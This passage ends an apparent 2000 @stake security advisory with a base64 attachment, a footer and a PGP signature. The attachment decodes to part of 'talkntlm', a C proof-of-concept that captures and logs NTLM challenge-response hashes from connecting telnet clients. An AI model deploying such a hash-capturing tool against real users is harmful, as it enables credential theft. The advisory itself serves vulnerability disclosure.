eDE4XSB8IChyZXNwYnVmWzB4MTldPDw4KTsKICAgIGxtcmVzcG9mZj1yZXNwYnVmWzB4MUNd IHwgKHJlc3BidWZbMHgxRF08PDgpIHwgCiAgICAgIChyZXNwYnVmWzB4MUVdPDwxNikgfCAo cmVzcGJ1ZlsweDFGXTw8MjQpOwogICAgbG1yZXNwPSh1bnNpZ25lZCBjaGFyICopbWFsbG9j KGxtcmVzcGxlbik7CiAgICBpZighbG1yZXNwKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBt ZW1jcHkobG1yZXNwLCZyZXNwYnVmW2xtcmVzcG9mZis0XSxsbXJlc3BsZW4pOwogICAgcHJp bnRmKCJMTSBSZXNwb25zZTpcbiIpOwogICAgZm9yKGk9MDtpPGxtcmVzcGxlbjtpKyspIHsK ICAgICAgcHJpbnRmKCIlMi4yWCAiLGxtcmVzcFtpXSk7CiAgICAgIGZwcmludGYobGYsIiUy LjJYIixsbXJlc3BbaV0pOwogICAgICBpZihpJTg9PTcpIHByaW50ZigiXG4iKTsKICAgIH0K ICAgIHByaW50ZigiXG4iKTsKICAgIGZwcmludGYobGYsIlxuIik7CiAgICBmcmVlKGxtcmVz cCk7ICAKICAgIAogICAgZnJlZShyZXNwYnVmKTsKICAgIAogICAgZmNsb3NlKGxmKTsKICAg IC8vIENsb3NlIHRoZSB0ZWxuZXQgc2Vzc2lvbgogICAgZmNsb3NlKGdfZkNvbW1Tb2NrKTsK ICAgIHByaW50ZigiY2xvc2VkIHRlbG5ldCBzb2NrZXQuXG4iKTsKCiAgfQoKICByZXR1cm4g MDsKICAKIHRlbG5ldGxvZ2ZhaWw6OyAvLyBGYWlsdXJlCiAgCiAgaWYobGYhPU5VTEwpCiAg ICBmY2xvc2UobGYpOwogIHByaW50ZigidGVsbmV0IG5lZ290aWF0aW9uIGZhaWxlZC5cbiIp OwogIGZjbG9zZShnX2ZDb21tU29jayk7CiAgCiAgcmV0dXJuIC01Owp9CgoKCnZvaWQgdXNh Z2UoY2hhciAqcHJvZ25hbWUsaW50IGV4aXRjb2RlKQp7CiAgcHJpbnRmKCJ0YWxrbnRsbSB2 JWQuJWQgKCVzKVxuIixNQUpPUl9WRVJTSU9OLE1JTk9SX1ZFUlNJT04scHJvZ25hbWUpOwog IHByaW50ZigidXNhZ2U6IHRhbGtudGxtIC10IFstcCA8cG9ydD5dIC1sIDxjaGFsbGVuZ2Ug cmVzcG9uc2UgbG9nZmlsZT5cbiIscHJvZ25hbWUpOwogIGV4aXQoZXhpdGNvZGUpOwp9CgoK aW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkKewogIHVuc2lnbmVkIGNoYXIgYjsK ICBpbnQgaSx0cDsKICAKICAvLyBHZXQgb3B0aW9ucwogIAogIGludCBvcHRfcG9ydD0wOwog IGNoYXIgKm9wdF9sb2dmaWxlPU5VTEw7CiAgTUVUSE9EIG9wdF9tZXRob2Q9TUVUSE9EX05P TkU7CiAgU1VCTUVUSE9EIG9wdF9zdWJtZXRob2Q9U1VCTUVUSE9EX05PTkU7CgogIGNoYXIg b2M7CiAgd2hpbGUoKG9jPWdldG9wdChhcmdjLGFyZ3YsImw6cDp0IikpPjApIHsKICAgIHN3 aXRjaChvYykgewogICAgY2FzZSAndCc6CiAgICAgIG9wdF9tZXRob2Q9TUVUSE9EX1RFTE5F VDsKICAgICAgaWYob3B0X3BvcnQ9PTApIHsKCW9wdF9wb3J0PTIzOwogICAgICB9CiAgICAg IGJyZWFrOwogICAgY2FzZSAncCc6CiAgICAgIG9wdF9wb3J0PWF0b2kob3B0YXJnKTsKICAg ICAgYnJlYWs7CiAgICBjYXNlICdsJzoKICAgICAgb3B0X2xvZ2ZpbGU9b3B0YXJnOwogICAg ICBpZihvcHRfc3VibWV0aG9kIT1TVUJNRVRIT0RfTk9ORSkKCXVzYWdlKGFyZ3ZbMF0sLTIp OwogICAgICBvcHRfc3VibWV0aG9kPVNVQk1FVEhPRF9MT0c7CiAgICAgIGJyZWFrOwogICAg ZGVmYXVsdDoKICAgICAgdXNhZ2UoYXJndlswXSwtMyk7CiAgICAgIAogICAgICBicmVhazsK ICAgIH0KICB9CiAgCiAgLy8gR28gdG8gdGhlIHBhcnRpY3VsYXIgbWV0aG9kCiAgaWYob3B0 X21ldGhvZD09TUVUSE9EX05PTkUpIHsKICAgIHVzYWdlKGFyZ3ZbMF0sLTQpOwogIH0gCiAg ZWxzZSBpZihvcHRfbWV0aG9kPT1NRVRIT0RfVEVMTkVUKSB7CiAgICAKICAgIC8vIFRlbG5l dCBtZXRob2RzCiAgICAKICAgIGlmKG9wdF9zdWJtZXRob2Q9PVNVQk1FVEhPRF9OT05FKSB7 CiAgICAgIHVzYWdlKGFyZ3ZbMF0sLTUpOwogICAgCiAgICB9CiAgICBlbHNlIGlmKG9wdF9z dWJtZXRob2Q9PVNVQk1FVEhPRF9MT0cpIHsKCiAgICAgIC8vIFRlbG5ldCBoYXNoIGxvZ2dp bmcKCiAgICAgIGlmKG9wdF9sb2dmaWxlPT1OVUxMKSB7Cgl1c2FnZShhcmd2WzBdLC03KTsK ICAgICAgfQogICAgICBpZihkb190ZWxuZXRfbG9nKG9wdF9wb3J0LG9wdF9sb2dmaWxlKSE9 MCkKCXJldHVybiAtODsKICAgIAogICAgfQoKICB9CgogIHJldHVybiAwOwp9CgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgo= ===================== For more advisories: http://www.atstake.com/research/advisories/ PGP Key: http://www.atstake.com/research/pgp_key.asc Copyright 2000 @stake, Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQA/AwUBOcEW2FESXwDtLdMhEQLnygCfXkCf0JtJJ4S4GSI+Mwo8gVR/Tg0AnRBY Rt6xVIMOB6Xi/VKj/A+bfwNw =retS -----END PGP SIGNATURE-----